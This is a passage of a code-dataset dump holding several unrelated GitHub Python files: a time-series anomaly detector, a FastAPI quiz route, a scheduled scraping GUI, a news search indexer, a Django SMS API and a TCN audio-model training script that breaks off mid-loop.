[]\n    for e_seq in E_seq:\n        if len(e_s[e_seq[0]:e_seq[1]]) > 0:\n            E_seq_max.append(max(e_s[e_seq[0]:e_seq[1]]))\n            e_s_max.append(max(e_s[e_seq[0]:e_seq[1]]))\n    e_s_max.sort(reverse=True)\n\n    if non_anom_max and non_anom_max > 0:\n        e_s_max.append(non_anom_max)  # for comparing the last actual anomaly to next highest below epsilon\n\n    i_to_remove = []\n    #p = 0.25  # TODO: don't hardcode this\n\n    for i in range(0, len(e_s_max)):\n        if i + 1 < len(e_s_max):\n            if (e_s_max[i] - e_s_max[i + 1]) / e_s_max[i] < p:\n                i_to_remove.append(E_seq_max.index(e_s_max[i]))\n                # p += 0.03 # increase minimum separation by this amount for each step further from max error\n            else:\n                i_to_remove = []\n    for idx in sorted(i_to_remove, reverse=True):\n        del E_seq[idx]\n\n    i_pruned = []\n    for i in i_anom:\n        keep_anomaly_idx = False\n\n        for e_seq in E_seq:\n            if i >= e_seq[0] and i <= e_seq[1]:\n                keep_anomaly_idx = True\n\n        if keep_anomaly_idx == True:\n            i_pruned.append(i)\n\n    return i_pruned\n\n\ndef get_anomalies(e_s, y_test, z, window, i_anom_full, len_y_test, p=0.25):\n    '''Find anomalous sequences of smoothed error values that are above error threshold (epsilon). 
Both\n    smoothed errors and the inverse of the smoothed errors are evaluated - large dips in errors often\n    also indicate anomalies.\n\n    Args:\n        e_s (list): smoothed errors between y_test and y_hat values\n        y_test (np array): test targets corresponding to true telemetry values at each timestep for given window\n        z (float): number of standard deviations above mean corresponding to epsilon\n        window (int): number of error windows that have been evaluated\n        i_anom_full (list): list of all previously identified anomalies in test set\n        len_y_test (int): num total test values available in dataset\n\n    Returns:\n        i_anom (list): indices of errors that are part of anomalous sequences\n    '''\n\n    perc_high, perc_low = np.percentile(y_test, [95, 5])\n    inter_range = perc_high - perc_low\n\n    mean = np.mean(e_s)\n    std = np.std(e_s)\n    chan_std = np.std(y_test)\n\n    e_s_inv = [mean + (mean - e) for e in e_s]  # flip it around the mean\n    z_inv = find_epsilon(e_s_inv, error_buffer)\n\n    epsilon = mean + (float(z) * std)\n    epsilon_inv = mean + (float(z_inv) * std)\n\n    # find sequences of anomalies greater than epsilon\n    E_seq, i_anom, non_anom_max = compare_to_epsilon(e_s, epsilon, len_y_test,\n                                                     inter_range, chan_std, std, error_buffer, window,\n                                                     i_anom_full)\n\n    # find sequences of anomalies using inverted error values (lower than normal errors are also anomalous)\n    E_seq_inv, i_anom_inv, inv_non_anom_max = compare_to_epsilon(e_s_inv, epsilon_inv,\n                                                                 len_y_test, inter_range, chan_std, std,\n                                                                 error_buffer, window, i_anom_full)\n\n    if len(E_seq) > 0:\n        i_anom = prune_anoms(E_seq, e_s, non_anom_max, i_anom, p)\n\n    if len(E_seq_inv) > 0:\n        i_anom_inv = prune_anoms(E_seq_inv, e_s_inv, inv_non_anom_max, i_anom_inv, p)\n\n    i_anom = list(set(i_anom + i_anom_inv))\n\n    return i_anom\n\n\n# Not using because I don't have labeled anomalies\n# def evaluate_sequences(E_seq, anom):\n#     '''Compare identified anomalous sequences with labeled anomalous sequences\n#\n#     Args:\n#         E_seq (list of lists): contains start and end indices of anomalous ranges\n#         anom (dict): contains anomaly information for a given input stream\n#\n#     Returns:\n#         anom (dict): with updated anomaly information (whether identified, scores, etc.)\n#     '''\n#\n#     anom[\"false_positives\"] = 0\n#     anom[\"false_negatives\"] = 0\n#     anom[\"true_positives\"] = 0\n#     anom[\"fp_sequences\"] = []\n#     anom[\"tp_sequences\"] = []\n#     anom[\"num_anoms\"] = len(anom[\"anomaly_sequences\"])\n#\n#     E_seq_test = eval(anom[\"anomaly_sequences\"])\n#\n#     if len(E_seq) > 0:\n#\n#         matched_E_seq_test = []\n#\n#         for e_seq in E_seq:\n#\n#             valid = False\n#\n#             for i, a in enumerate(E_seq_test):\n#\n#                 if (e_seq[0] >= a[0] and e_seq[0] <= a[1]) or (e_seq[1] >= a[0] and e_seq[1] <= a[1]) or \\\n#                         (e_seq[0] <= a[0] and e_seq[1] >= a[1]) or (a[0] <= e_seq[0] and a[1] >= e_seq[1]):\n#\n#                     anom[\"tp_sequences\"].append(e_seq)\n#\n#                     valid = True\n#\n#                     if i not in matched_E_seq_test:\n#                         anom[\"true_positives\"] += 1\n#                         matched_E_seq_test.append(i)\n#\n#             if valid == False:\n#                 anom[\"false_positives\"] += 1\n#                 anom[\"fp_sequences\"].append([e_seq[0], e_seq[1]])\n#\n#         anom[\"false_negatives\"] += (len(E_seq_test) - len(matched_E_seq_test))\n#\n#     else:\n#         anom[\"false_negatives\"] += len(E_seq_test)\n#\n#     return anom\n\n#####################################\n# Function was created by CO Boulder student, Shawn Polson\n# Adjusted for this project by improving outputs and making parameters adjustable instead of hardcoded\n\ndef detect_anomalies(ts, normal_model, ds_name, var_name, alg_name, 
window_size = 30, batch_size=70, smoothing_perc=0.05,\n                     p=0.25, outlier_def='dynamic', num_stds=2, ndt_errors=None,\n                     plot_save_path=None, data_save_path=None):\n    \"\"\"Detect outliers in the time series data by comparing points against a \"normal\" model.\n    Inputs:\n        ts [pd Series]: A pandas Series with a DatetimeIndex and a column for numerical values.\n        normal_model [pd Series]: A pandas Series with a DatetimeIndex and a column for numerical values.\n        ds_name [str]: The name of the time series dataset.\n        var_name [str]: The name of the dependent variable in the time series.\n        alg_name [str]: The name of the algorithm used to create 'normal_model'.\n    Optional Inputs:\n        outlier_def [str]: {'std', 'errors', 'dynamic'} The definition of an outlier to be used. Can be 'std' for [num_stds] from the data's mean,\n                           'errors' for [num_stds] from the mean of the errors, or 'dynamic' for nonparametric dynamic thresholding\n                           Default is 'dynamic'.\n        num_stds [float]: The number of standard deviations away from the mean used to define point outliers (when applicable).\n                          Default is 2.\n        ndt_errors [list]: Optionally skip nonparametric dynamic thresholding's 'get_errors()' and use these values instead.\n        plot_save_path [str]: The file path (ending in file name *.png) for saving plots of outliers.\n        data_save_path [str]: The file path (ending in file name *.csv) for saving CSVs with outliers.\n    Outputs:\n        time_series_with_outliers [pd DataFrame]: A pandas DataFrame with a DatetimeIndex, two columns for numerical values, and an Outlier column (True or False).\n    Optional Outputs:\n        None\n    Example:\n        time_series_with_outliers = detect_anomalies(time_series, model, 'BatteryTemperature', 'Temperature (C)',\n                                                     'ARIMA', 'dynamic', plot_path, data_path)\n    \"\"\"\n\n    X = ts.values\n    Y = normal_model.values\n    outliers = pd.Series()\n    errors = pd.Series()\n    time_series_with_outliers = pd.DataFrame({var_name: ts, alg_name: normal_model})\n    time_series_with_outliers['Outlier'] = 'False'\n    column_names = [var_name, alg_name, 'Outlier']  # column order\n    time_series_with_outliers = time_series_with_outliers.reindex(columns=column_names)  # sort columns in specified order\n\n    # Start a progress bar\n    widgets = [progressbar.Percentage(), progressbar.Bar(), progressbar.Timer(), ' ', progressbar.AdaptiveETA()]\n    progress_bar_sliding_window = progressbar.ProgressBar(\n        widgets=[progressbar.FormatLabel('Outliers (' + ds_name + ')')] + widgets,\n        maxval=int(len(X))).start()\n\n\n    # Define outliers using JPL's nonparametric dynamic thresholding technique\n    if outlier_def == 'dynamic':\n        progress_bar_sliding_window.update(int(len(X))/2)  # start progress bar timer\n        outlier_points = []\n        outlier_indices = []\n        if ndt_errors is not None:\n            smoothed_errors = ndt_errors\n        else:\n            # note get_errors takes batch_size before window_size\n            smoothed_errors = get_errors(X, Y, batch_size, window_size, smoothing_perc)\n        time_series_with_outliers['errors'] = smoothed_errors\n        \n        # These are the results of the nonparametric dynamic thresholding\n        E_seq, anom_scores = process_errors(X, smoothed_errors, window_size, batch_size, p)\n        progress_bar_sliding_window.update(int(len(X)) - 1)  # advance progress bar timer\n\n        # Convert sets of outlier start/end indices into outlier points\n        for anom in E_seq:\n            start = anom[0]\n            end = anom[1]\n            for i in range(start, end+1):\n                time_series_with_outliers.at[ts.index[i], 'Outlier'] = 'True'\n                outlier_points.append(X[i])\n                outlier_indices.append(ts.index[i])\n        outliers = outliers.append(pd.Series(outlier_points, index=outlier_indices))\n    \n    # Plot anomalies\n    ax = 
ts.plot(color='#192C87', title=ds_name + ' with ' + alg_name + ' Outliers', label=var_name, figsize=(14, 6))\n normal_model.plot(color='#0CCADC', label=alg_name, linewidth=1.5)\n if len(outliers) > 0:\n print('Detected outliers (' + ds_name + '): ' + str(len(outliers)))\n outliers.plot(color='red', style='.', label='Outliers')\n ax.set(xlabel='Time', ylabel=var_name)\n pyplot.legend(loc='best')\n\n # Save plot\n if plot_save_path is not None:\n plot_dir = plot_save_path[:plot_save_path.rfind('/')+1]\n if not os.path.exists(plot_dir):\n os.makedirs(plot_dir)\n pyplot.savefig(plot_save_path, dpi=500)\n\n pyplot.show()\n pyplot.clf()\n\n # Save data\n if data_save_path is not None:\n data_dir = data_save_path[:data_save_path.rfind('/')+1]\n if not os.path.exists(data_dir):\n os.makedirs(data_dir)\n time_series_with_outliers.to_csv(data_save_path)\n\n return time_series_with_outliers\n","repo_name":"Isaacburmingham/multivariate-time-series-anomaly-detection","sub_path":"Algorithm Modeling Functions/nonparametric_dynamic_thresholding.py","file_name":"nonparametric_dynamic_thresholding.py","file_ext":"py","file_size_in_byte":22546,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"38"}
+{"seq_id":"4681900095","text":"from typing import List\n\nfrom fastapi import APIRouter, Body, Depends, BackgroundTasks\nfrom pydantic import conint\nfrom sqlalchemy.orm import Session\n\nfrom src.question_service import question_service\nfrom .db.session import get_db\nfrom .schemas import Question\n\nrouter = APIRouter()\n\n\n@router.get('/', tags=['Root'])\nasync def root():\n return {'message': '200 OK'}\n\n\n@router.post(\n '/',\n tags=['Question'],\n response_model=List[Question],\n summary=\"Get quiz questions\"\n)\ndef get_question(\n *, db: Session = Depends(get_db),\n questions_num: conint(gt=0) = Body(1, embed=True),\n background_tasks: BackgroundTasks\n):\n background_tasks.add_task(\n question_service.get_and_save_questions,\n db=db,\n count=questions_num\n )\n\n return question_service.find(\n db=db,\n limit=questions_num\n )\n","repo_name":"MRainbowM/test_bewise","sub_path":"src/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":864,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"5102965794","text":"# imports\n\nimport tkinter as tk\nimport subprocess\nimport schedule\nimport time\nimport threading\nimport datetime\n\n\nclass GUI:\n def __init__(self):\n self.root = tk.Tk()\n self.root.title(\"DomoLazeriai scrap APP. By IamGuber.\")\n \n # info log\n\n self.log = tk.Text(self.root, height=10, width=50)\n self.log.pack()\n \n # push button\n\n self.button = tk.Button(self.root, text=\"Start scrap\", command=self.start_function)\n self.button.pack()\n\n # push button2\n\n self.button = tk.Button(self.root, text=\"Start email\", command=self.start_function2)\n self.button.pack()\n \n # schedule the Start button to be clicked every day by clock\n\n schedule.every().day.at(\"06:00\").do(self.start_function)\n\n # schedule the Start button2 to be clicked every day by clock\n\n schedule.every().day.at(\"09:00\").do(self.start_function2)\n\n\n def start_function2(self):\n self.log.insert(tk.END, \"\\nStarting email sending...\\n\")\n\n # start email file sending\n\n try:\n subprocess.Popen([\"python\", \"/Users/voisk/Desktop/SCRAPING APP/mail_sending.py\"])\n self.log.insert(tk.END, \"Email send successfully.\\n\" f\"{datetime.datetime.now()}\")\n except Exception as e:\n self.log.insert(tk.END, f\"Error sending email file: {str(e)}\\n\")\n \n\n def start_function(self):\n self.log.insert(tk.END, \"\\nStarting scrap function...\\n\")\n\n # start scrap file \n\n try:\n subprocess.Popen([\"python\", \"/Users/voisk/Desktop/SCRAPING APP/scrap.py\"])\n self.log.insert(tk.END, \"Scrap file started successfully.\\n\" f\"{datetime.datetime.now()}\")\n except Exception as e:\n self.log.insert(tk.END, f\"Error starting scrap file: {str(e)}\\n\")\n\n\n def run(self):\n\n # start the scheduler in a new thread\n\n schedule_thread = threading.Thread(target=self.schedule_loop, daemon=True)\n schedule_thread.start()\n \n # start the GUI\n\n self.root.mainloop()\n \n\n def schedule_loop(self):\n\n # run the scheduler loop in the background\n\n while True:\n schedule.run_pending()\n time.sleep(1)\n\n\n# create and run the GUI\n\ngui = GUI()\ngui.run()","repo_name":"IamGuber/Scrap-APP","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2289,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"24825096294","text":"import json\r\n\r\nimport pandas\r\nfrom pre_processor import DocTokenizer\r\nfrom dictionary import Dictionary\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport math\r\nimport pickle\r\nimport glob\r\nimport os\r\nfrom mongoengine import connect\r\nfrom model.news import NewsModel\r\n\r\ndoc_tokenizer = DocTokenizer()\r\ndata_set = '../IR-project-data-phase-3-100k'\r\n\r\nconnect('IREngine', host=\"mongodb://localhost:27017\")\r\n\r\n\r\n# def doc2file(doc_id):\r\ndef to_db():\r\n idx = 0\r\n for filename in glob.glob(os.path.join(data_set, '*.csv')):\r\n df = pandas.read_csv(filename, encoding='utf_8')\r\n\r\n for inn in range(df.shape[0]):\r\n\r\n idx += 1\r\n print('saving' + str(idx))\r\n doc = df.loc[inn, :]\r\n content = doc_tokenizer.clean_html(doc['content'])\r\n publish_date = doc['publish_date']\r\n title = doc['title']\r\n url = doc['url']\r\n summary = doc['summary']\r\n if type(summary) is float:\r\n summary = ' '\r\n meta_tags = json.loads(doc['meta_tags'])\r\n thumbnail = doc['thumbnail']\r\n if type(thumbnail) is float:\r\n thumbnail = 'https://www.bvfd.com/wp-content/uploads/2015/12/placeholder.jpg'\r\n if type(title) is float:\r\n title = \"خبر\"\r\n news = NewsModel()\r\n news.meta_tags = meta_tags\r\n news.thumbnail = thumbnail\r\n news.url = url\r\n news.content = content\r\n news.publish_date = publish_date\r\n news.summary = summary\r\n news.title = title\r\n news.news_id = idx - 1\r\n news.save()\r\n\r\n\r\ndef get_news_by_id(doc):\r\n return NewsModel.objects(news_id=doc)\r\n\r\n\r\ndef indexing():\r\n print(\"Creating index.txt...\")\r\n dictionary = Dictionary()\r\n to_db()\r\n doc2term = dict()\r\n docId = 0\r\n for filename in glob.glob(os.path.join(data_set, '*.csv')):\r\n print(\"Creating Index of \", filename)\r\n df = pandas.read_csv(filename, encoding='utf_8')\r\n for doc in df['content']:\r\n # total_tokens = np.zeros(df.shape[0]) #zeapf and heapf law\r\n # total_terms = np.zeros(df.shape[0]) #zeapf and heapf law\r\n # doc2term_file = open('./doc2term.txt', 'w', encoding='utf_8')\r\n print('Indexing doc ', docId)\r\n positionals = doc_tokenizer.get_tokens(doc)\r\n\r\n # if i != 0:\r\n # total_tokens[i] = total_tokens[i - 1] #zeapf and heapf law\r\n terms = []\r\n # doc2term_file.write(str(i) + ' => ')\r\n doc2term[docId] = list()\r\n\r\n for positional in positionals:\r\n # dictionary.add_term_to_dictionary(positional, i)\r\n # total_tokens[i] = total_tokens[i] + len(positional[1]) #zeapf and heapf law\r\n # terms.append((positional[0], len(positional[1]))) #zeapf and heapf law\r\n # doc2term_file.write(str(positional[0]) + ':' + str(len(positional[1])) + ',')\r\n doc2term[docId].append((str(positional[0]), len(positional[1])))\r\n if dictionary.existed_in_dictionary(positional[0]):\r\n dictionary.add_term_to_dictionary(positional, docId)\r\n # temp = dictionary.terms_cf[positional[0]] #zeapf and heapf law\r\n else:\r\n new_posting = list()\r\n new_posting.append((docId, positional[1]))\r\n dictionary.dictionary[positional[0]] = (1, new_posting)\r\n # temp = 0 # zeapf and heapf law\r\n docId += 1\r\n print(\"Done\")\r\n # dictionary.terms_cf[positional[0]] = len(positional[1]) + temp #zeapf and heapf law\r\n # doc2term_file.write('\\n')\r\n\r\n # total_terms[i] = len(dictionary.dictionary.keys())\r\n\r\n # heaps_law(total_tokens, total_terms)\r\n # zipfs_law(dictionary.terms_cf)\r\n # dict = dictionary.get_dictionary()\r\n # print(dictionary.get_dictionary()['ایران'])\r\n\r\n with 
open('inverted_index_500.pickle', 'wb') as handle:\r\n        pickle.dump(dictionary.get_dictionary(), handle, protocol=pickle.HIGHEST_PROTOCOL)\r\n\r\n    with open('doc2term_index_500.pickle', 'wb') as handle:\r\n        pickle.dump(doc2term, handle, protocol=pickle.HIGHEST_PROTOCOL)\r\n\r\n    # with open('./index.txt', 'w', encoding=\"utf_8\") as f:\r\n    #     for key in sorted(dict.keys()):\r\n    #         f.writelines([key, \" => \", str(dict[key]), \"\\n\"])\r\n    print(\"Done!\")\r\n\r\n\r\ndef fetch_result(doc_list):\r\n    # df = pandas.read_csv(data_set)\r\n    result = []\r\n    for doc_id in doc_list:\r\n        # content = df['content'][doc_id]\r\n        # content = doc_tokenizer.clean_html(content)\r\n        # content = doc_tokenizer.text_normalizer(content)\r\n        #\r\n        # publish_date = df['publish_date'][doc_id]\r\n        # title = df['title'][doc_id]\r\n        # url = df['url'][doc_id]\r\n        # summary = df['summary'][doc_id]\r\n        # if type(summary) is float:\r\n        #     summary = ' '\r\n        # meta_tags = df['meta_tags'][doc_id]\r\n        # thumbnail = df['thumbnail'][doc_id]\r\n        # if type(thumbnail) is float:\r\n        #     thumbnail = 'https://www.bvfd.com/wp-content/uploads/2015/12/placeholder.jpg'\r\n        # result.append(news)\r\n        q = get_news_by_id(doc_id)\r\n        print(q)\r\n        if len(q) > 0:\r\n            nw = q[0]\r\n            news = {'content': str(nw.content), 'publish_date': str(nw.publish_date), 'title': str(nw.title), 'url': str(nw.url),\r\n                    'summary': str(nw.summary),\r\n                    'meta_tags': nw.meta_tags, 'thumbnail': str(nw.thumbnail)}\r\n            result.append(news)\r\n        else:\r\n            return []\r\n    return result\r\n\r\n\r\ndef heaps_law(total_tokens, total_terms):\r\n    total_tokens = np.log10(total_tokens)\r\n    total_terms = np.log10(total_terms)\r\n    x = np.linspace(0, total_tokens[len(total_tokens) - 1], 2000)\r\n    y = math.log(40, 10) + (1 / 2) * x\r\n    plt.plot(total_tokens, total_terms)\r\n    plt.plot(x, y, '--')\r\n    plt.xlabel('log10 T')\r\n    plt.ylabel('log10 M')\r\n    plt.title(\"Heaps' law\")\r\n    plt.savefig('./plots/heaps.png')\r\n    plt.show()\r\n\r\n\r\ndef zipfs_law(terms_cf):\r\n    sorted_terms_cf = [(k, terms_cf[k]) for k in sorted(terms_cf, key=terms_cf.get, reverse=True)]\r\n    total_cf = []\r\n    for k, v in sorted_terms_cf:\r\n        total_cf.append(v)\r\n    total_cf = np.array(total_cf)\r\n    total_cf = np.log10(total_cf)\r\n    print(total_cf)\r\n    total_ranks = np.arange(len(total_cf))\r\n    total_ranks = total_ranks + 1\r\n    total_ranks = np.log10(total_ranks)\r\n    print(total_ranks)\r\n    x = np.linspace(0, total_ranks[len(total_ranks) - 1], 2000)\r\n    y = math.log(10000, 10) - x\r\n    plt.plot(total_ranks, total_cf)\r\n    plt.plot(x, y, '--')\r\n    plt.xlabel('log10 rank')\r\n    plt.ylabel('log10 cf')\r\n    plt.title(\"Zipf's law\")\r\n    plt.savefig('./plots/zipfs.png')\r\n    plt.show()\r\n\r\n\r\nif __name__ == '__main__':\r\n    # indexing()\r\n    # caltest()\r\n    to_db()\r\n    a = get_news_by_id([10304, 12])\r\n    print(get_news_by_id([10304, 12]))\r\n    # print(fetch_result([108]))\r\n    # doclist = [15]\r\n    # result = fetch_result(doclist)\r\n    # print(result)\r\n    # for r in result:\r\n    #     print(r['summary'])\r\n","repo_name":"parsareal/News-Search-Engine","sub_path":"TextMinning-master/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":7301,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"70843477551","text":"import uuid\nimport phonenumbers\n\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom rest_framework import status\nfrom rest_framework.parsers import JSONParser\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework.generics import get_object_or_404\n\nfrom sms_counter import SMSCounter\n\nfrom .models import SMSMessage, InvalidSMSMessage, SMSMessageStateLog\n\n\nclass VTigerPluginAPI(APIView):\n \"\"\" API to Send SMS \"\"\"\n parser_classes = (JSONParser,)\n permission_classes = (IsAuthenticated,)\n \n def post(self, request, format=None):\n data = request.data\n recipients = data.get(\"to\")\n sms_message = data.get(\"message\")\n \n if not recipients or len(recipients) == 0:\n return Response(\"Recipient(s) missing\", status=status.HTTP_400_BAD_REQUEST)\n \n if not sms_message:\n return Response(\"Message missing\", status=status.HTTP_400_BAD_REQUEST)\n \n result = {\n \"messages\": [],\n \"invalid_numbers\": []\n }\n \n # set bulkId\n bulk_id = None\n if len(recipients) > 1:\n bulk_id = data.get(\"bulkId\", uuid.uuid4())\n result[\"bulkId\"] = bulk_id \n \n counter = SMSCounter.count(data.get(\"message\"))\n \n for recipient in recipients:\n try:\n # this will raise an exception early if number is invalid\n phonenumbers.parse(recipient, None)\n \n m = SMSMessage.objects.create(\n id = data.get(\"messageId\", uuid.uuid4()),\n bulk_id = bulk_id,\n text = data.get(\"message\"),\n recipient = recipient,\n owner = request.user,\n pages = counter[\"messages\"]\n )\n \n result[\"messages\"].append(\n {\n \"to\": str(m.recipient),\n \"submitted\": True,\n \"messageId\": m.id,\n \"smsCount\": m.pages\n }\n ) \n except phonenumbers.phonenumberutil.NumberParseException:\n result[\"invalid_numbers\"].append(recipient)\n raise ValueError(f\"Invalid recipient number: {recipient}\")\n except ValueError as ve:\n InvalidSMSMessage.objects.create(\n text = data.get(\"message\"),\n recipient = recipient,\n user = request.user,\n message = m,\n error_reason = ve\n )\n return Response(result, status=status.HTTP_201_CREATED)\n \nclass SMSReport(APIView):\n \n permission_classes = (IsAuthenticated,)\n \n def get(self, request, messageid, format=None):\n m = get_object_or_404(SMSMessage, id=messageid, user=request.user)\n \n result = {}\n #sucessfully sent\n latest_state = m.status\n if latest_state == SMSMessage.Status.SUCCESS:\n result['sent'] = True\n result['to'] = str(m.recipient)\n result['time'] = latest_state.timestamp\n elif latest_state == SMSMessage.Status.ERROR:\n result['error'] = True\n result['errorReason'] = latest_state.state_reason \n elif latest_state == SMSMessage.Status.FAILED:\n result['failed'] = True\n \n return Response(result)","repo_name":"dedayoa/yeastar-sms-bridge","sub_path":"sms/apis.py","file_name":"apis.py","file_ext":"py","file_size_in_byte":3580,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"33956801631","text":"import os\nimport glob\nimport torch\nimport torchsummary\nfrom itertools import product\nimport pytorch_lightning as pl\nfrom argparse import ArgumentParser\n\nfrom microtcn.tcn import TCNModel\nfrom microtcn.lstm import LSTMModel\nfrom microtcn.data import SignalTrainLA2ADataset\n\ntorch.backends.cudnn.benchmark = True\n\ntrain_configs = [\n {\"name\" : \"uTCN-300\",\n \"model_type\" : \"tcn\",\n \"nblocks\" : 4,\n \"dilation_growth\" : 10,\n \"kernel_size\" : 13,\n \"causal\" : True,\n \"train_fraction\" : 0.01,\n \"batch_size\" : 32\n },\n {\"name\" : \"uTCN-100\",\n \"model_type\" : \"tcn\",\n \"nblocks\" : 4,\n \"dilation_growth\" : 10,\n \"kernel_size\" : 5,\n \"causal\" : True,\n \"train_fraction\" : 1.00,\n \"batch_size\" : 32\n },\n {\"name\" : \"uTCN-300\",\n \"model_type\" : \"tcn\",\n \"nblocks\" : 4,\n \"dilation_growth\" : 10,\n \"kernel_size\" : 13,\n \"causal\" : True,\n \"train_fraction\" : 1.00,\n \"batch_size\" : 32\n },\n {\"name\" : \"uTCN-1000\",\n \"model_type\" : \"tcn\",\n \"nblocks\" : 5,\n \"dilation_growth\" : 10,\n \"kernel_size\" : 5,\n \"causal\" : True,\n \"train_fraction\" : 1.00,\n \"batch_size\" : 32\n },\n {\"name\" : \"uTCN-100\",\n \"model_type\" : \"tcn\",\n \"nblocks\" : 4,\n \"dilation_growth\" : 10,\n \"kernel_size\" : 5,\n \"causal\" : False,\n \"train_fraction\" : 1.00,\n \"batch_size\" : 32\n },\n {\"name\" : \"uTCN-300\",\n \"model_type\" : \"tcn\",\n \"nblocks\" : 4,\n \"dilation_growth\" : 10,\n \"kernel_size\" : 13,\n \"causal\" : False,\n \"train_fraction\" : 1.00,\n \"batch_size\" : 32\n },\n {\"name\" : \"uTCN-1000\",\n \"model_type\" : \"tcn\",\n \"nblocks\" : 5,\n \"dilation_growth\" : 10,\n \"kernel_size\" : 5,\n \"causal\" : False,\n \"train_fraction\" : 1.00,\n \"batch_size\" : 32\n },\n {\"name\" : \"TCN-300\",\n \"model_type\" : \"tcn\",\n \"nblocks\" : 10,\n \"dilation_growth\" : 2,\n \"kernel_size\" : 15,\n \"causal\" : False,\n \"train_fraction\" : 1.00,\n \"batch_size\" : 32\n },\n {\"name\" : \"uTCN-300\",\n \"model_type\" : \"tcn\",\n \"nblocks\" : 4,\n \"dilation_growth\" : 10,\n \"kernel_size\" : 13,\n \"causal\" : True,\n \"train_fraction\" : 0.10,\n \"batch_size\" : 32\n },\n {\"name\" : \"LSTM-32\",\n \"model_type\" : \"lstm\",\n \"num_layers\" : 1,\n \"hidden_size\" : 32,\n \"train_fraction\" : 1.00,\n \"batch_size\" : 32\n },\n {\"name\" : \"uTCN-300\",\n \"model_type\" : \"tcn\",\n \"nblocks\" : 3,\n \"dilation_growth\" : 60,\n \"kernel_size\" : 5,\n \"causal\" : True,\n \"train_fraction\" : 1.0,\n \"batch_size\" : 32\n },\n {\"name\" : \"uTCN-300\",\n \"model_type\" : \"tcn\",\n \"nblocks\" : 4,\n \"dilation_growth\" : 10,\n \"kernel_size\" : 13,\n \"causal\" : True,\n \"train_fraction\" : 1.0,\n \"batch_size\" : 32,\n \"max_epochs\" : 60,\n \"train_loss\" : \"l1\"\n },\n {\"name\" : \"uTCN-300\",\n \"model_type\" : \"tcn\",\n \"nblocks\" : 30,\n \"dilation_growth\" : 2,\n \"kernel_size\" : 15,\n \"causal\" : False,\n \"train_fraction\" : 1.0,\n \"batch_size\" : 32,\n \"max_epochs\" : 60,\n },\n {\"name\" : \"uTCN-324-16\",\n \"model_type\" : \"tcn\",\n \"nblocks\" : 10,\n \"dilation_growth\" : 2,\n \"kernel_size\" : 15,\n \"causal\" : False,\n \"train_fraction\" : 1.0,\n \"batch_size\" : 32,\n \"max_epochs\" : 60,\n \"channel_width\" : 16,\n },\n]\n\nn_configs = len(train_configs)\n\nfor idx, tconf in enumerate(train_configs):\n\n #if (idx+1) not in [14]: continue\n # if you only want to train a specific model\n\n parser = ArgumentParser()\n\n # add PROGRAM level args\n 
parser.add_argument('--model_type', type=str, default='tcn', help='tcn or lstm')\n parser.add_argument('--root_dir', type=str, default='./data')\n parser.add_argument('--preload', action=\"store_true\")\n parser.add_argument('--sample_rate', type=int, default=44100)\n parser.add_argument('--shuffle', type=bool, default=True)\n parser.add_argument('--train_subset', type=str, default='train')\n parser.add_argument('--val_subset', type=str, default='val')\n parser.add_argument('--train_length', type=int, default=65536)\n parser.add_argument('--train_fraction', type=float, default=1.0)\n parser.add_argument('--eval_length', type=int, default=131072)\n parser.add_argument('--batch_size', type=int, default=32)\n parser.add_argument('--num_workers', type=int, default=16)\n\n # add all the available trainer options to argparse\n parser = pl.Trainer.add_argparse_args(parser)\n\n # THIS LINE IS KEY TO PULL THE MODEL NAME\n temp_args, _ = parser.parse_known_args()\n\n print(f\"* Training config {idx+1}/{n_configs}\")\n print(tconf)\n \n # let the model add what it wants\n if temp_args.model_type == 'tcn':\n parser = TCNModel.add_model_specific_args(parser)\n elif temp_args.model_type == 'lstm':\n parser = LSTMModel.add_model_specific_args(parser)\n\n # parse them args\n args = parser.parse_args()\n\n # set the seed\n pl.seed_everything(42)\n\n # only run 60 epochs\n args.max_epochs = 60\n\n # init the trainer and model \n if tconf[\"model_type\"] == 'tcn':\n specifier = f\"{idx+1}-{tconf['name']}\"\n specifier += \"__causal\" if tconf['causal'] else \"__noncausal\"\n specifier += f\"__{tconf['nblocks']}-{tconf['dilation_growth']}-{tconf['kernel_size']}\"\n specifier += f\"__fraction-{tconf['train_fraction']}-bs{tconf['batch_size']}\"\n elif tconf[\"model_type\"] == 'lstm':\n specifier = f\"{idx+1}-{tconf['name']}\"\n specifier += f\"__{tconf['num_layers']}-{tconf['hidden_size']}\"\n specifier += f\"__fraction-{tconf['train_fraction']}-bs{tconf['batch_size']}\"\n\n if \"max_epochs\" in tconf:\n args.max_epochs = tconf[\"max_epochs\"]\n else:\n args.max_epochs = 60\n\n if \"train_loss\" in tconf:\n args.train_loss = tconf[\"train_loss\"]\n specifier += f\"__loss-{tconf['train_loss']}\"\n\n args.precision = 16\n\n args.default_root_dir = os.path.join(\"lightning_logs\", \"bulk\", specifier)\n print(args.default_root_dir)\n trainer = pl.Trainer.from_argparse_args(args)\n\n # setup the dataloaders\n train_dataset = SignalTrainLA2ADataset(args.root_dir, \n subset=args.train_subset,\n fraction=tconf[\"train_fraction\"],\n half=True if args.precision == 16 else False,\n preload=args.preload,\n length=args.train_length)\n\n train_dataloader = torch.utils.data.DataLoader(train_dataset, \n shuffle=args.shuffle,\n batch_size=tconf[\"batch_size\"],\n num_workers=args.num_workers,\n pin_memory=True)\n\n val_dataset = SignalTrainLA2ADataset(args.root_dir, \n preload=args.preload,\n half=True if args.precision == 16 else False,\n subset=args.val_subset,\n length=args.eval_length)\n\n val_dataloader = torch.utils.data.DataLoader(val_dataset, \n shuffle=False,\n batch_size=8,\n num_workers=args.num_workers,\n pin_memory=True)\n\n # create the model with args\n dict_args = vars(args)\n dict_args[\"nparams\"] = 2\n\n if tconf[\"model_type\"] == 'tcn':\n dict_args[\"nblocks\"] = tconf[\"nblocks\"]\n dict_args[\"dilation_growth\"] = tconf[\"dilation_growth\"]\n 